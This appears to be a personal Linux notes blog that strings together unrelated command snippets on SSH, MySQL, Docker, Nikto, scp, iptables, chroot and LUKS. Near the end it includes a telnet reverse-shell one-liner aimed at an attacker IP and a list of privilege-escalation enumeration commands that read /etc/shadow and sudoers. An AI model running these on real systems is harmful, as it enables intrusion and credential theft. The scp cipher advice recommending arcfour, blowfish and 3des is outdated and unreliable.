-/+ buffers/cache: 430168 1635328
Swap: 4128760 112 4128648
Transferring files over SSH
This is particularly important for programs such as scp or rsync which use SSH for data transfer. This detailed description of how the SCP protocol works explains how the SCP protocol consists of a mixture of textual protocol messages and binary file data.
OpenSSH helps protects you from yourself
It’s worth noting that even if the -t flag is used, the OpenSSH ssh client will refuse to allocate a pseudo-terminal if it detects that its stdin stream is not a terminal:
$ echo testing | ssh -t anthony@remote_host 'echo $TERM'
Pseudo-terminal will not be allocated because stdin is not a terminal.
dumb
You can still force the OpenSSH client to allocate a pseudo-terminal with -tt:
$ echo testing | ssh -tt anthony@remote_host 'echo $TERM'
xterm
In either case, it (sensibly) doesn’t care if stdout or stderr are redirected:
8 GREAT MYSQL PERFORMANCE TIPS
By Zvonko Biškup In Articles, Tips 5 Min read
You finished your brand new application, everything is working like a charm. Users are coming and using your web. Everybody is happy.
Then, suddenly, a big burst of users kills your MySQL server and your site is down. What went wrong? How can you prevent it?
Here are some tips on MySQL Performance which will help you and help your database.
THINK BIG
In the early stage of development you should be aware of expected number of users coming to your application. If you expect many users, you should think big from the very beginning, plan for replication, scalability and performance.
But, if you optimize your SQL code, schema and indexing strategy, maybe you will not need big environment. You must always think twice as performance and scalability is not the same.
ALWAYS USE EXPLAIN
The EXPLAIN statement can be used either as a way to obtain information about how MySQL executes a SELECT statement or as a synonym for DESCRIBE.
When you precede a SELECT statement with the keyword EXPLAIN, MySQL displays information from the optimizer about the query execution plan. That is, MySQL explains how it would process the SELECT, including information about how tables are joined and in which order. EXPLAIN EXTENDED can be used to provide additional information.
CHOOSE THE RIGHT DATA TYPE
Databases are typically stored on disk (with the exception of some, like MEMORY databases, which are stored in memory). This means that in order for the database to fetch information for you, it must read that information off the disk and turn it into a results set that you can use. Disk I/O is extremely slow, especially in comparison to other forms of data storage.
When your database grows to be large, the read time begins to take longer and longer. Poorly designed databases deal with this problem by allocating more space on the disk than they need. This means that the database occupies space on the disk that is being used inefficiently.
Picking the right data types can help by ensuring that the data we are storing makes the database as small as possible. We do this by selecting only the data types we need.
USE PERSISTENT CONNECTIONS
The reason behind using persistent connections is reducing number of connects which are rather expensive, even though they are much faster with MySQL than with most other databases.
There are some debate on the web on this topic and mysqli extension has disabled persistent connection feature, so I will not write much more on this topic. The only downside of persistent connections is that if you have many concurrent connections, max_connections setting could be reached. This is easily changed in Apache settings, so I don’t think this is the reason why you should not use persistent connections.
Persistent connections are particularly useful if you have db server on another machine. Because of the mentioned downside, use them wisely.
LEARN ABOUT QUERY CACHE
The query cache stores the text of a SELECT statement together with the corresponding result that was sent to the client. If an identical statement is received later, the server retrieves the results from the query cache rather than parsing and executing the statement again. The query cache is shared among sessions, so a result set generated by one client can be sent in response to the same query issued by another client.
The query cache can be useful in an environment where you have tables that do not change very often and for which the server receives many identical queries. This is a typical situation for many Web servers that generate many dynamic pages based on database content.
The query cache does not return stale data. When tables are modified, any relevant entries in the query cache are flushed.
How do you find out my MySQL query cache is working or not?
MySQL provides the stats of same just type following command at mysql> prompt:
1
mysql> show variables like 'query%';
DO NOT USE INDEXED COLUMN IN A FUNCTION
Index on a column can be great performance gain, but if you use that column in a function, index is never used.
Always try to rewrite the query to not use the function with indexed column.
WHERE TO_DAYS(CURRENT_DATE) - TO_DAYS(event_date) <= 7
[/code]
could be
[code lang="sql"]
WHERE event_date >= '2011/03/15' - INTERVAL 7 DAYS
and today’s date is generated from PHP. This way, index on column event_date is used and the query can be stored inside Query Cache.
LEARN THE ZEN OF SQL CODING
SQL code is the foundation for optimizing database performance. Master SQL coding techniques like rewriting subquery SQL statements to use JOINS, eliminating cursors with JOINS and similar.
By writing great SQL code your database performance will be great.
USE ON DUPLICATE KEY UPDATE
If you specify ON DUPLICATE KEY UPDATE, and a row is inserted that would cause a duplicate value in a UNIQUE index or PRIMARY KEY, an UPDATE of the old row is performed.
INSERT INTO wordcount (word, count)
VALUES ('a_word',1)
ON DUPLICATE KEY UPDATE count=count+1;
You are saving one trip to the server (SELECT then UPDATE), cleaning you code up removing all if record_exists insert else update.
If you follow some of this tips, database will be greatful to you.
The service --status-all command tries to figure out for every init script in /etc/init.d if it supports a status command (by grepping the script for status).
If it doesn't find that string it will print [ ? ] for that service.
Otherwise it will run /etc/init.d/$application status.
If the return code is 0 it prints [ + ].
If it's not 0 it prints [ - ].
Why does ssh print [ - ] even though it's still running?
ssh is controlled by upstart in Ubuntu (13.10).
Running /etc/init.d/ssh status will produce no output and a return code of 1.
$docker attach :Attach local standard input, output, and error streams to a running container $docker build :Build an image from a Dockerfile $docker checkpoint :Manage checkpoints $docker commit :Create a new image from a container’s changes $docker config :Manage Docker configs $docker container :Manage containers $docker cp :Copy files/folders between a container and the local filesystem $docker create :Create a new container $docker deploy :Deploy a new stack or update an existing stack $docker diff :Inspect changes to files or directories on a container’s filesystem $docker events :Get real time events from the server $docker exec :Run a command in a running container $docker export :Export a container’s filesystem as a tar archive $docker history :Show the history of an image $docker image :Manage images $docker images :List images $docker import :Import the contents from a tarball to create a filesystem image $docker info :Display system-wide information $docker inspect :Return low-level information on Docker objects $docker kill :Kill one or more running containers $docker load :Load an image from a tar archive or STDIN $docker login :Log in to a Docker registry $docker logout :Log out from a Docker registry $docker logs :Fetch the logs of a container $docker manifest :Manage Docker image manifests and manifest lists $docker network :Manage networks $docker node :Manage Swarm nodes $docker pause :Pause all processes within one or more containers $docker plugin :Manage plugins $docker port :List port mappings or a specific mapping for the container $docker ps :List containers $docker pull :Pull an image or a repository from a registry $docker push :Push an image or a repository to a registry $docker rename :Rename a container $docker restart :Restart one or more containers $docker rm :Remove one or more containers $docker rmi :Remove one or more images $docker run :Run a command in a new container $docker save :Save one or more images to a tar archive (streamed to STDOUT by default) $docker search :Search the Docker Hub for images $docker secret :Manage Docker secrets $docker service :Manage services $docker stack :Manage Docker stacks $docker start :Start one or more stopped containers $docker stats :Display a live stream of container(s) resource usage statistics $docker stop :Stop one or more running containers $docker swarm :Manage Swarm $docker system :Manage Docker $docker tag :Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE $docker top :Display the running processes of a container $docker trust :Manage trust on Docker images $docker unpause :Unpause all processes within one or more containers $docker update :Update configuration of one or more containers $docker version :Show the Docker version information $docker volume :Manage volumes $docker wait :Block until one or more containers stop, then print their exit codes
Nikto c’est quoi?
C’est un scanner de vulnérabilités web écrit en perl et sous licence GPL. Il va permettre de tester la sécurité de la configuration de votre serveur web (les options HTTP, les index,les failles XSS potentielles,injections SQL etc…)
Disclaimer
A utiliser uniquement sur ses propres serveurs. Le scan est bruyant,et génère plusieurs dizaines de lignes de logs avec votre IP dans les logs apache ou dans n’importe quel IDS. L’intérêt est de trouver des failles chez soi pour pouvoir sécuriser au mieux nos serveurs webs.
Installation du script
De base il est présent sous la distribution KALI. ici je vais l’installer sur ma raspbian qui héberge un serveur web apache.
La version Nikto v2.1.6 est disponible sur le github:
Scan multihosts
Il est possible de scanner une plage d’adresses de serveurs web. Nikto est capable de lire sur son entrée standard. Du coup,on lui donne « à bouffer » le résultat d’un scan nmap :
nmap -p80 192.168.0.0/24 -oG – | ./nikto.pl -h –
Scan verbeux et debug
il faut rajouter l’option -D -v. En reprenant l’exemple précédent ca donne:
./nikto.pl -h [URL] -p 8080,80,443 -D -v
Derrière un proxy
sudo vim /nikto-master/program/nikto.conf
Préciser le proxy
# Proxy settings -- still must be enabled by -useproxy
PROXYHOST= ip_ou_url_du_proxy
PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword
Test du scan avec le proxy paramétré précédemment:
./nikto.pl -h [URL] -useproxy
Comprendre quelques failles
on va partir du simple résultat de la commande :
I strongly suggest the use of paccache instead of pacman -Sc. There is even a very effective flag for removing selectively the versions of uninstalled packages -u. The flags of paccache I recommend are (as part of paccache v5.0.2):
pacman -Sy pacman-contrib
-d, --dryrun: perform a dry run, only finding candidate packages
-r, --remove: remove candidate packages
-u, --uninstalled: target uninstalled packages only
-k, --keep : keep "num" of each package in the cache (default: 3)
Example: Check for remaining cache versions of uninstalled packages
paccache -dvuk0
Open Chrome.
Type chrome://flags in the address bar and hit the Enter key.
Press Ctrl+F and look for Strict Site Isolation.
Click Enable to turn the feature ON.
As you click Enable, a Relaunch Now button will appear.
Relaunch Chrome to make the changes take effect. The browser will relaunch with all your tabs open.
Enable Strict Site Isolation by changing the Target
Right-click the Chrome icon and select Properties.
Under the Shortcut tab, in the ‘Target’ field, paste ‘–site-per-process’ after the quotation marks with space.
So the target should now appear as:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
ssh-keygen -t rsa
Best algorithm is ed25519
Enter file in which to save the key (/home/exemple/.ssh/
ssh-copy-id user@123.45.56.78
Or
cat ~/.ssh/id_rsa.pub | ssh user@123.45.56.78
"mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
To retrieve the CPU affinity information of a process, use the following format. taskset returns the current CPU affinity in a hexadecimal bitmask format.
taskset -p
For example, to check the CPU affinity of a process with PID 2915:
$ taskset -p 2915
pid 2915's current affinity mask: ff
In this example, the returned affinity (represented in a hexadecimal bitmask) corresponds to "11111111" in binary format, which means the process can run on any of eight different CPU cores (from 0 to 7).
The lowest bit in a hexadecimal bitmask corresponds to core ID 0, the second lowest bit from the right to core ID 1, the third lowest bit to core ID 2, etc. So for example, a CPU affinity "0x11" represents CPU core 0 and 4.
taskset can show CPU affinity as a list of processors instead of a bitmask, which is easier to read. To use this format, run taskset with "-c" option. For example:
$ taskset -cp 2915
pid 2915's current affinity list: 0-7
Pin a Running Process to Particular CPU Core(s)
Using taskset, you can "pin" (or assign) a running process to particular CPU core(s). For that, use the following format.
$ taskset -p
$ taskset -cp
For example, to assign a process to CPU core 0 and 4, do the following.
$ taskset -p 0x11 9030
pid 9030's current affinity mask: ff
pid 9030's new affinity mask: 11
Or equivalently:
$ taskset -cp 0,4 9030
With "-c" option, you can specify a list of numeric CPU core IDs separated by commas, or even include ranges (e.g., 0,2,5,6-10).
Note that in order to be able to change the CPU affinity of a process, a user must have CAP_SYS_NICE capability. Any user can view the affinity mask of a process.
Launch a Program on Specific CPU Cores
taskset also allows you to launch a new program as pinned to specific CPU cores. For that, use the following format.
taskset
For example, to launch vlc program on a CPU core 0, use the following command.
$ taskset 0x1 vlc
Dedicate a Whole CPU Core to a Particular Program
While taskset allows a particular program to be assigned to certain CPUs, that does not mean that no other programs or processes will be scheduled on those CPUs. If you want to prevent this and dedicate a whole CPU core to a particular program, you can use "isolcpus" kernel parameter, which allows you to reserve the CPU core during boot.
Add the kernel parameter "isolcpus=" to the boot loader during boot or GRUB configuration file. Then the Linux scheduler will not schedule any regular process on the reserved CPU core(s), unless specifically requested with taskset. For example, to reserve CPU cores 0 and 1, add "isolcpus=0,1" kernel parameter. Upon boot, then use taskset to safely assign the reserved CPU cores to your program.
Macvtap is a new device driver meant to simplify virtualized bridged networking. It replaces the combination of the tun/tap and bridge drivers with a single module based on the macvlan device driver. A macvtap endpoint is a character device that largely follows the tun/tap ioctl interface and can be used directly by kvm/qemu and other hypervisors that support the tun/tap interface. The endpoint extends an existing network interface, the lower device, and has its own mac address on the same ethernet segment. Typically, this is used to make both the guest and the host show up directly on the switch that the host is connected to.
VEPA, Bridge and private mode
Like macvlan, any macvtap device can be in one of three modes, defining the communication between macvtap endpoints on a single lower device:
Virtual Ethernet Port Aggregator (VEPA), the default mode: data from one endpoint to another endpoint on the same lower device gets sent down the lower device to external switch. If that switch supports the hairpin mode, the frames get sent back to the lower device and from there to the destination endpoint.
Most switches today do not support hairpin mode, so the two endpoints are not able to exchange ethernet frames, although they might still be able to communicate using an tcp/ip router. A linux host used as the adjacent bridge can be put into hairpin mode by writing to /sys/class/net/dev/brif/port/hairpin_mode. This mode is particularly interesting if you want to manage the virtual machine networking at the switch level. A switch that is aware of the VEPA guests can enforce filtering and bandwidth limits per MAC address without the Linux host knowing about it.
Bridge, connecting all endpoints directly to each other. Two endpoints that are both in bridge mode can exchange frames directly, without the round trip through the external bridge. This is the most useful mode for setups with classic switches, and when inter-guest communication is performance critical.
For completeness, a private mode exists that behaves like a VEPA mode endpoint in the absence of a hairpin aware switch. Even when the switch is in hairpin mode, a private endpoint can never communicate to any other endpoint on the same lowerdev.
Setting up macvtap
A macvtap interface is created an configured using the ip link command from iproute2, in the same way as we configure macvlan or veth interfaces.
Example:
$ ip link add link eth1 name macvtap0 type macvtap
$ ip link set macvtap0 address 1a:46:0b:ca:bc:7b up
$ ip link show macvtap0
12: macvtap0@eth1: mtu 1500 qdisc noqueue state UNKNOWN
link/ether 1a:46:0b:ca:bc:7b brd ff:ff:ff:ff:ff:ff
At the same time a character device gets created by udev. Unless configured otherwise, udev names this device /dev/tapn, with n corresponding to the number of network interface index of the new macvtap endpoint, in the above example '12'. Unlike tun/tap, the character device only represents a single network interface, and we can give the ownership to a user or group that we want to be able to use the new tap. Configuring the mac address of the endpoint is important, because this address is used on the external network, the guest is not able to spoof or change that address and has to be configured with the same address.
Qemu on macvtap
Qemu as of 0.12 does not have direct support for macvtap, so we have to (ab)use the tun/tap configuration interface. To start a guest on the interface from the above example, we need to pass the device node as an open file descriptor to qemu and tell it about the mac address. The scripts normally used for bridge configuration must be disabled. A bash redirect can be used to open the character device in read/write mode and pass it as file descriptor 3.
Print kernel IP routing table : route
Add a default gateway : route add default gw 192.168.1.10
Kernel IP routing cache : route -Cn
3 methods to Reject a host (nullroute): route add -host 192.168.1.51 reject route add 65.21.34.4 gw 127.0.0.1 lo ip route add blackhole from 202.54.5.2
3 methods to Reject a network (nullroute): route add -net 192.168.1.0 netmask 255.255.255.0 reject route add -net 65.21.0.0/16 gw 127.0.0.1 lo ip route add blackhole 202.54.5.2/29
Add a route for a network : ip route add 172.1.0.0/16 via 10.0.0.25
Sow the routing table : ip route show
Adding a bridge : ip link add name bridge_name type bridge
Set up : ip link set bridge_name up
Set eth0 as master : ip link set eth0 master bridge_name
Unset eht0 as master : ip link set eth0 nomaster
Copy one single file from a remote server to another remote server
With scp you can copy files between remote servers from a third server without the need to ssh into any of them, all weight lifting will be done by scp itself.
This time, you will be copying from one host to the same host, but on different folders under the control of different users.
Copy multiple files with one command
You can copy multiple files at once without having to copy all the files in a folder, or copy multiple files from different folders putting them in a space separated list.
This will copy all files of a given extension to the remote server. For instance, you want to copy all your text files (txt extension) to a new folder.
This will result in having in the remote server this: /home/jane/backup/html/.... The whole html folder and its contentes recursively have been copied to the remote server.
Tips
We have seen the basic uses scp, now we will see some special uses and tricks of this great command
Increase Speed
scp uses AES-128 to encrypt data, this is very secure, but also a litle bit slow. If you need more speed and still have security, you can use Blowfish or RC4.
To increase scp speed change chipher from the default AES-128 to Blowfish
scp -c blowfish user@server:/home/user/file .
Or use RC4 which seems to be the fastest
scp -c arcfour user@server:/home/user/file .
This last one is not very secure, and it may not be used if security is really an issue for you.
Increase Security
If security is what you want, you can increase it, you will lose some speed though.
scp -c 3des user@server:/home/user/file .
Limit Bandwidth
You may limit the bandwidth used by scp command
scp -l limit username@server:/home/uername/* .
Where limit is specified in Kbit/s. So for example, if you want to limit speed at 50 Kbps
Using the capital letter P you can make scp to use a port other than 22 which is the default for ssh. Let's say your remote server is listening on 2222.
If you want to see what is happening under the hood, use the -v parameter for a verbose output
scp -v user@server:/home/jane/file /home/jane/
Windows
If you are working on a Windows powered computer, you can still enjoy scp in various ways, of course if you are a "*nix guy" you will prefer the command line, and you also have GUI tools available.
pscp
pscp is a shell command that works almost on Windows Shell almost the same way that scp works on Linux or Mac OS X, you first need to download it from this page, here is the direct link.
Once downloaded you can invoque it from the Windows command line, go to the start menu and click on run then write
cmd
And press ENTER, if you are on Windows 8.x hit the Windows/Super key and click on the magnifier lens, type cmd and hit ENTER.
Once in the command line, be sure to be in the directory where the pscp file was downloaded, or add that folder to your PATH, let's suppose the folder is your Downloads folder, run this command:
SET PATH=C:\Users\Guillermo\Downloads;%PATH%
You will have to set that command every time you open a new command shell, or you can add the path permanently, how to do that is out of the scope of this article.
Below are the options of the command, you will see that the options available let you do almost everything.
PuTTY Secure Copy client
Release 0.63
Usage: pscp [options] [user@]host:source target
pscp [options] source [source...] [user@]host:target
pscp [options] -ls [user@]host:filespec
Options:
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-p preserve file attributes
-q quiet, don't show statistics
-r copy directories recursively
-v show verbose messages
-load sessname Load settings from saved session
-P port connect to specified port
-l user connect with specified username
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-noagent disable use of Pageant
-agent enable use of Pageant
-batch disable all interactive prompts
-unsafe allow server-side wildcards (DANGEROUS)
-sftp force use of SFTP protocol
-scp force use of SCP protocol
Copy files from Windows to Linux
You can use scp command to copy files from Linux to Windows
Sometimes you will have problems with lid open close on laptop
Edit /etc/systemd/logind.conf and make sure you have,
HandleLidSwitch=ignore
You can change ignore by suspend, poweroff
which will make it ignore the lid being closed. (You may need to also undo the other changes you've made).
Then, you'll want to reload logind.conf to make your changes go into effect (thanks to Ehtesh Choudhury for pointing this out in the comments):
systemctl restart systemd-logind
Full details over at the archlinux Wiki.
The man page for logind.conf also has the relevant information,
Controls whether logind shall handle the system power and sleep
keys and the lid switch to trigger actions such as system power-off
or suspend. Can be one of ignore, poweroff, reboot, halt, kexec,
suspend, hibernate, hybrid-sleep and lock. If ignore logind will
never handle these keys. If lock all running sessions will be
screen locked. Otherwise the specified action will be taken in the
respective event. Only input devices with the power-switch udev tag
will be watched for key/lid switch events. HandlePowerKey=
defaults to poweroff. HandleSuspendKey= and HandleLidSwitch=
default to suspend. HandleHibernateKey= defaults to hibernate.
create the symfony folder with all the Website (generally in /var/www)
change right first to a non admin/sudo user :
# sudo chown -R user: user /var/www/symfony
Allow the user www-data access to the files inside the application folder. Give this user a read + execute permission (rX) in the whole directory.
# sudo setfacl -R -m u:www-data:rX symfony
Give read + write + execute permissions (rwX) to the user www-data in order to enable the web server to write only in these directories.
# sudo setfacl -R -m u:www-data:rwX symfony/var/cache symfony/var/logs
Finally, we will define that all new files created inside the app/cache and app/logs folders follow the same permission schema we just defined, with read, write, and execute permissions to the web server user. This is done by repeating the setfacl command we just ran, but this time adding the -d option.
prepare the folder :
mount /device/to/chroot /chroot/point
If necessary :
mount /device/of/boot /chroot/point/boot
export PATH="$PATH:/usr/sbin:/sbin:/bin"
cd /location/of/new/root
# mount -t proc proc proc/
# mount --rbind /sys sys/
# mount --rbind /dev dev/
And optionally:
# mount --rbind /run run/
Next, in order to use an internet connection in the chroot environment copy over the DNS details:
# cp /etc/resolv.conf etc/resolv.conf
Finally, to change root into /location/of/new/root using a bash shell:
As a User
#chroot /chroot /bin/su - user
#chroot --userspec=user:user --groups=group1 /chroot /bin/bash
As Root
# chroot /location/of/new/root /bin/bash
export PATH="$PATH:/usr/sbin:/sbin:/bin"
# xhost +local:
# echo $DISPLAY
as the user that owns the X server to see the value of DISPLAY. If the value is ":0" (for example), then in the chroot environment run
What are weak password ?
String_7878
that's a weak password :
-> Upper case at the beginning
-> Short
-> Number at the end
-> Some tools like Hydra or haschcat can crack this in a second with rainbow table
Good password are random char
kfkq8H@_-0-POlkcwr
advantages :
-> Hard to online crack
-> Long
-> No upper case at the beginning
-> No number at the end
-> Require a lot of computer power to crack
-> Need to brute force it wont work with dictionary attacks
that's good but not perfect :
-> Hard to remember
-> Hard to type
-> Not really future proof
Perfect Password are :
nOOdles_in_@_cup_thats_marv3l0us
Why :
-> It's long
-> No upper case at the beginning
-> Special chars
-> No Number at the end
-> Easy to type
-> Easy to remember
-> Plus if you can write in an another language than English it's harder to crack
-> Future proof
-> Hard to offline and online crack
-D: Tells SSH that we want a SOCKS tunnel on the specified port number (you can choose a number between 1025-65536)
-f: Forks the process to the background
-C: Compresses the data before sending it
-q: Uses quiet mode
-N: Tells SSH that no command will be sent once the tunnel is up
-L local listening
-R Server listening
-p port on distant machine
### Flush, append a few rules, than drop & save ### iptables -F iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT iptables -I INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -P OUTPUT ACCEPT iptables -P INPUT DROP
/sbin/iptables -A OUTPUT -p tcp --dport {PORT-NUMBER-HERE} -j DROP
### interface section use eth1 ### /sbin/iptables -A OUTPUT -o eth1 -p tcp --dport {PORT-NUMBER-HERE} -j DROP
### only drop port for given IP or Subnet ##
/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP-ADDRESS-HERE} -j DROP /sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP/SUBNET-HERE} -j DROP /sbin/iptables -A OUTPUT -p tcp -d 192.168.1.2 --dport 1234 -j DROP /sbin/service iptables save
# Logging #
### If you would like to log dropped packets to syslog, first log it ### /sbin/iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix "PORT 80 DROP: " --log-level 7
### now drop it ### /sbin/iptables -A INPUT -p tcp --destination-port 80 -j DROP
/sbin/iptables -A INPUT -s 123.1.2.3 -i eth1 -p udp -m state --state NEW -m udp --dport 161 -j DROP
# drop students 192.168.1.0/24 subnet to port 80 /sbin/iptables -A INPUT -s 192.168.1.0/24 -i eth1 -p tcp -m state --state NEW -m tcp --dport 80 -j DROP
nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Users, rights, superpowers, mail
id whoami w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l
cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Set a UUID for the LUKS partition: cryptsetup luksUUID --uuid "" /dev/sdxX
Open a LUKS device: cryptsetup luksOpen dmsetup info
Create quickly a key: dd if=/dev/urandom of=$HOME/keyfile bs=32 count=1 chmod 600 $HOME/keyfile
Add a key for device : cryptsetup luksAddKey ~/keyfile
Remove a device key: cryptsetup luksRemoveKey
Close the volume group: lvchange -a n My_vg_crypt cryptsetup -v
Close the LUKS device: luksClose My_Crypt luks-bxxaccxx-xxxd-4f3a-xxxx-16965ea084d1
Well why you should stick with it :
- to install it quickly
- to get frequent system and packets update
- for a stable environment
- to get used to the most used ;-)
Some say you could work with others distribution.
It's up to you.
1) Fedora
Based on red hat, it is very stable, well documented, easy to install. It has SELINUX very good for security.
2)Open Suse
Is a distribution oriented on developers, sysadmins,
But easy to use and easy to install. SELINUX too.
3) Ubuntu
Is for the beginner, oriented to people who need a lot of graphical apps. Stable too and easy to install.
4) Arch Linux
Why Arch for Workstation's?
Well it's not for beginners.
Once you know what you do, no problems a great distribution, very well documented.
For Workstation's you should go for linux-lts kernel.
Use lvm and make snapshots.
5)Debian
Debian is stable but some packets updates are slow to come. It's a great distribution though it's great for servers
Hi all and Welcome, please feel free to post any comment but be respectful please!
The purpose of this blog is to remember me commands and great articles I use for Linux and Dev.
If an article belong to you please let me know I will add your name and a link to your website.
Thanks
Have a nice day!